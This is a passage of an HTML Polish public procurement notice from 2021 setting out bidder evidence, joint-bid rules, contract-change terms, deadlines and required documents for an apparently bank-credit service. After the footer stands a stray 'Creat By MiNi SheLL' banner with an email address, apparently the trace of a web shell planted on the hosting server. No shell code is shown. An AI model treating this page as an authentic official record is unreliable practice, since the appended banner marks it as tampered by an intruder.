wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Informacja o podmiotowych środkach dowodowych żądanych w celu potwierdzenia spełnienia warunków udziału w postępowaniu – które na wezwanie Zamawiającego będzie zobowiązany złożyć Wykonawca, którego oferta została najwyżej oceniona.<br/>W zakresie spełniania warunków udziału w postępowaniu dotyczących:<br/>1. Zdolności do występowania w obrocie gospodarczym – nie dotyczy niniejszego postępowania<br/> 2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika <br/> to z odrębnych przepisów<br/>koncesji, zezwolenia, licencji lub dokumentu potwierdzającego, że wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania t.j.: zezwolenia Komisji Nadzoru Bankowego na prowadzenie działalności bankowej a także realizacji usług objętych przedmiotem zamówienia zgodnie z przepisami ustawy z dnia 29.08.1997 roku Prawo bankowe (Dz. U. z 2020 poz. 1896 z późn. zm.) a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy;<br/> 3. Sytuacja ekonomiczna lub finansowa - nie dotyczy niniejszego postępowania<br/> 4. Zdolności technicznej lub zawodowej - nie dotyczy niniejszego postępowania</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. wspólnicy spółki cywilnej lub członkowie konsorcjum) mają obowiązek ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego muszą dołączyć do oferty stosowne pełnomocnictwo.<br/>3.	Pełnomocnictwo musi zawierać stwierdzenie, że pełnomocnicy są uprawnieni do reprezentowania <br/>w postępowaniu i zaciągania zobowiązań w imieniu podmiotów występujących wspólnie.<br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VI.1.pkt 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.	Do oferty należy dołączyć oświadczenie, o którym mowa w art. 117 ust. 4 ustawy PZP, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>6.	W przypadku wyboru oferty wykonawców wspólnie ubiegających się o zamówienie jako najkorzystniejszej, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, kopi umowy regulującej współprace tych wykonawców.<br/>7.	Pełnomocnictwo składane jest w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp w przypadku:<br/>1) wystąpi siła wyższa uniemożliwiająca Wykonawcy wykonanie przedmiotu zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia umowy o czas w jakim siła wyższa uniemożliwiła wykonanie obowiązków Stron,<br/>2) wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizacje umowy ze strony Wykonawcy lub Zamawiającego).<br/>3) wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy oraz nie są zmianami istotnych postanowień umowy.<br/>4) wystąpi zmiana przepisów prawa, a w szczególności taka, która powoduje, że wykonanie zobowiązania wiąże się z rażąco wysokimi kosztami, wówczas dopuszczalna jest zmian wynagrodzenia,<br/>5) wystąpi, wynikająca z uwarunkowań budżetowych Zamawiającego, konieczność zmiany terminu wykorzystania kredytu, terminu spłaty kredytu lub terminu spłaty poszczególnych rat kredytu, wówczas ww. terminy mogą ulec zmianie. <br/>Oraz w następujących przypadka określonych w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę sklada się za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokumenty, które wykonawcy muszą złożyć wraz z ofertą:<br/>1)	wypełniony i podpisany formularz oferty – na załączniku Nr 1;<br/>2)	oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu – na załączniku Nr 2;<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców.<br/>3)	oświadczenie Wykonawcy wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy<br/>Z którego wynika, które usługi wykonają poszczególni wykonawcy w przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy pzp; <br/>4)	załącznik stanowiący tajemnice przedsiębiorstwa – jeżeli dotyczy;<br/>5)	pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego – jeżeli dotyczy</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com